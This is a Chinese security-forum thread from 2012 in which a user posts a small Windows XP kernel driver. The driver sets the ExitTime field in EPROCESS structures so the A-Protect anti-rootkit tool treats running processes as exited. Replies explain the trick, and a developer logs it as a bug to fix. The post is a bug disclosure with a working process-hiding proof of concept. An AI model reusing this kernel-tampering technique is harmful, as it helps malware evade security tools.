A盾 (A-Protect) 枚举进程的一个bug-编程技术-看雪-安全社区|安全招聘|kanxue.com

A盾 (A-Protect) 枚举进程的一个bug

发表于: 2012-6-5 21:37 14203

A盾 (A-Protect) 枚举进程的一个bug

莫灰灰

2012-6-5 21:37

14203

ps:
1.A盾为最新版本（2012-06-01 A盾电脑防护 v0.2.6 快乐儿童版）。
2.驱动只在XP Sp3下测试有效。
3.A盾在我机器上驱动老是加载失败啊。

/*******************************************
* AUTHOR : 莫灰灰
* DATE   : 2012-6-5
* BOLG   : http://blog.csdn.net/hu3167343
*******************************************/

#include <ntddk.h>

NTSTATUS
PsLookupProcessByProcessId(
						   IN HANDLE ProcessId,
						   OUT PEPROCESS *Process
						 );

NTSTATUS
DriverEntry(
			IN PDRIVER_OBJECT pDriverObj, 
			IN PUNICODE_STRING pRegistryString
			)
{
	int i = 0;
	PEPROCESS pEprocess = NULL;
	NTSTATUS status;

	for ( i = 0; i < 5000; i += 4 )
	{
		status = PsLookupProcessByProcessId((HANDLE)i, &pEprocess);

		if (NT_SUCCESS(status))
		{
			*(PULONG)((ULONG)pEprocess + 0x78) = 1;  
		}
	}
	
	return STATUS_SUCCESS;
}

驱动加载之后，A盾就悲催了。

[课程]FART 脱壳王！加量不加价！FART作者讲授！

上传的附件：

2012-06-05_211853.png （3.75kb，394次下载）
2012-06-05_212210.png （23.95kb，393次下载）

收藏・2

免费・6

支持

最新回复 (16)
loongzyd 雪币： 1015 活跃值： (235) 能力值： ( LV12，RANK：440 ) 在线值：发帖 191 回帖 1111 粉丝 4 关注私信	loongzyd 10 2 楼目前还看不懂，支持一个。 2012-6-5 21:59 0
evilkis 雪币： 596 活跃值： (449) 能力值： ( LV12，RANK：320 ) 在线值：发帖 15 回帖 509 粉丝 8 关注私信	evilkis 7 3 楼 IsExitProcess 2012-6-5 22:14 0
forlovefor 雪币： 279 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 92 粉丝 0 关注私信	forlovefor 4 楼这代码是什么意思哦 2012-6-5 22:53 0
心如止境雪币： 316 活跃值： (128) 能力值： ( LV7，RANK：110 ) 在线值：发帖 42 回帖 361 粉丝 2 关注私信	心如止境 2 5 楼 (PULONG)((ULONG)pEprocess + 0x78) = 1; 对应的成员指向LARGE_INTEGER ExitTime,这个值不为0就代表进程退出了,应该是A盾对这个值有检测,前5000个PID退出了 for ( i = 0; i < 5000; i += 4 ) { status = PsLookupProcessByProcessId((HANDLE)i, &pEprocess); if (NT_SUCCESS(status)) { (PULONG)((ULONG)pEprocess + 0x78) = 1; } } 解答完毕！ 2012-6-6 00:43 0
心如止境雪币： 316 活跃值： (128) 能力值： ( LV7，RANK：110 ) 在线值：发帖 42 回帖 361 粉丝 2 关注私信	心如止境 2 6 楼恶搞娱乐而已,还Bug.要是用多种方法检测,你觉得你能有机会吗？ PS:这个应该为A盾设计思路上的失误,作者一个人开发毕竟有考虑到不周全的地方. 2012-6-6 00:46 0
心如止境雪币： 316 活跃值： (128) 能力值： ( LV7，RANK：110 ) 在线值：发帖 42 回帖 361 粉丝 2 关注私信	心如止境 2 7 楼相关参考链接：http://bbs.pediy.com/showthread.php?t=99502 2012-6-6 00:52 0
panti 雪币： 1602 活跃值： (14) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 254 粉丝 0 关注私信	panti 8 楼 A盾在检测内核hook时容易蓝屏，XueTr不会 2012-6-6 07:10 0
莫灰灰雪币： 2177 活跃值： (2045) 能力值： (RANK：400 ) 在线值：发帖 22 回帖 710 粉丝 46 关注私信	莫灰灰 9 9 楼这不是bug那什么是bug？我这里是演示才隐藏了前5000的pid。恶意软件完全可以只隐藏自身，就可以过A盾的检测了。 2012-6-6 08:43 0
guxinyi 雪币： 585 活跃值： (568) 能力值： ( LV13，RANK：290 ) 在线值：发帖 61 回帖 681 粉丝 16 关注私信	guxinyi 5 10 楼小灰灰测试很积极啊估计是driverentry返回unsuccess。。软件没bug那就不叫软件了。有时候没Bug只不过是没发现而已 2012-6-6 08:55 0
elianmeng 雪币： 967 活跃值： (1138) 能力值： ( LV6，RANK：90 ) 在线值：发帖 68 回帖 707 粉丝 4 关注私信	elianmeng 1 11 楼有则该之，无则优化 2012-6-6 09:03 0
Winker 雪币： 796 活跃值： (370) 能力值： ( LV9，RANK：380 ) 在线值：发帖 133 回帖 1127 粉丝 18 关注私信	Winker 8 12 楼收到~这个bug登记一下~~~ 2012-6-6 09:13 0
Winker 雪币： 796 活跃值： (370) 能力值： ( LV9，RANK：380 ) 在线值：发帖 133 回帖 1127 粉丝 18 关注私信	Winker 8 13 楼收到，这个bug登记一下，感谢灰灰的测试，下版本fix~~ 2012-6-6 09:14 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 6 关注私信	KiDebug 4 14 楼 http://bbs.pediy.com/showthread.php?t=146046 2012-6-6 10:32 0
zhczf 雪币： 10845 活跃值： (17236) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 401 粉丝 0 关注私信	zhczf 15 楼路过，看不懂 2012-10-30 10:17 0
libocdf 雪币： 119 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 297 粉丝 0 关注私信	libocdf 16 楼谢谢解答！！ 2013-8-9 04:32 0
sidyh 雪币： 160 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 134 粉丝 0 关注私信	sidyh 17 楼 PsLookupProcessByProcessId后记得ObDereferenceObject 2013-8-9 05:54 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

莫灰灰

发帖

710

回帖

400

RANK

关注

私信

他的文章

[原创] AntiSpy开源啦 27228

关于我们

联系我们

企业服务

看雪公众号

最新回复 (16)
loongzyd 雪币： 1015 活跃值： (235) 能力值： ( LV12，RANK：440 ) 在线值：发帖 191 回帖 1111 粉丝 4 关注私信	loongzyd 10 2 楼目前还看不懂，支持一个。 2012-6-5 21:59 0
evilkis 雪币： 596 活跃值： (449) 能力值： ( LV12，RANK：320 ) 在线值：发帖 15 回帖 509 粉丝 8 关注私信	evilkis 7 3 楼 IsExitProcess 2012-6-5 22:14 0
forlovefor 雪币： 279 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 92 粉丝 0 关注私信	forlovefor 4 楼这代码是什么意思哦 2012-6-5 22:53 0
心如止境雪币： 316 活跃值： (128) 能力值： ( LV7，RANK：110 ) 在线值：发帖 42 回帖 361 粉丝 2 关注私信	心如止境 2 5 楼 (PULONG)((ULONG)pEprocess + 0x78) = 1; 对应的成员指向LARGE_INTEGER ExitTime,这个值不为0就代表进程退出了,应该是A盾对这个值有检测,前5000个PID退出了 for ( i = 0; i < 5000; i += 4 ) { status = PsLookupProcessByProcessId((HANDLE)i, &pEprocess); if (NT_SUCCESS(status)) { (PULONG)((ULONG)pEprocess + 0x78) = 1; } } 解答完毕！ 2012-6-6 00:43 0
心如止境雪币： 316 活跃值： (128) 能力值： ( LV7，RANK：110 ) 在线值：发帖 42 回帖 361 粉丝 2 关注私信	心如止境 2 6 楼恶搞娱乐而已,还Bug.要是用多种方法检测,你觉得你能有机会吗？ PS:这个应该为A盾设计思路上的失误,作者一个人开发毕竟有考虑到不周全的地方. 2012-6-6 00:46 0
心如止境雪币： 316 活跃值： (128) 能力值： ( LV7，RANK：110 ) 在线值：发帖 42 回帖 361 粉丝 2 关注私信	心如止境 2 7 楼相关参考链接：http://bbs.pediy.com/showthread.php?t=99502 2012-6-6 00:52 0
panti 雪币： 1602 活跃值： (14) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 254 粉丝 0 关注私信	panti 8 楼 A盾在检测内核hook时容易蓝屏，XueTr不会 2012-6-6 07:10 0
莫灰灰雪币： 2177 活跃值： (2045) 能力值： (RANK：400 ) 在线值：发帖 22 回帖 710 粉丝 46 关注私信	莫灰灰 9 9 楼这不是bug那什么是bug？我这里是演示才隐藏了前5000的pid。恶意软件完全可以只隐藏自身，就可以过A盾的检测了。 2012-6-6 08:43 0
guxinyi 雪币： 585 活跃值： (568) 能力值： ( LV13，RANK：290 ) 在线值：发帖 61 回帖 681 粉丝 16 关注私信	guxinyi 5 10 楼小灰灰测试很积极啊估计是driverentry返回unsuccess。。软件没bug那就不叫软件了。有时候没Bug只不过是没发现而已 2012-6-6 08:55 0
elianmeng 雪币： 967 活跃值： (1138) 能力值： ( LV6，RANK：90 ) 在线值：发帖 68 回帖 707 粉丝 4 关注私信	elianmeng 1 11 楼有则该之，无则优化 2012-6-6 09:03 0
Winker 雪币： 796 活跃值： (370) 能力值： ( LV9，RANK：380 ) 在线值：发帖 133 回帖 1127 粉丝 18 关注私信	Winker 8 12 楼收到~这个bug登记一下~~~ 2012-6-6 09:13 0
Winker 雪币： 796 活跃值： (370) 能力值： ( LV9，RANK：380 ) 在线值：发帖 133 回帖 1127 粉丝 18 关注私信	Winker 8 13 楼收到，这个bug登记一下，感谢灰灰的测试，下版本fix~~ 2012-6-6 09:14 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 6 关注私信	KiDebug 4 14 楼 http://bbs.pediy.com/showthread.php?t=146046 2012-6-6 10:32 0
zhczf 雪币： 10845 活跃值： (17236) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 401 粉丝 0 关注私信	zhczf 15 楼路过，看不懂 2012-10-30 10:17 0
libocdf 雪币： 119 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 297 粉丝 0 关注私信	libocdf 16 楼谢谢解答！！ 2013-8-9 04:32 0
sidyh 雪币： 160 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 134 粉丝 0 关注私信	sidyh 17 楼 PsLookupProcessByProcessId后记得ObDereferenceObject 2013-8-9 05:54 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复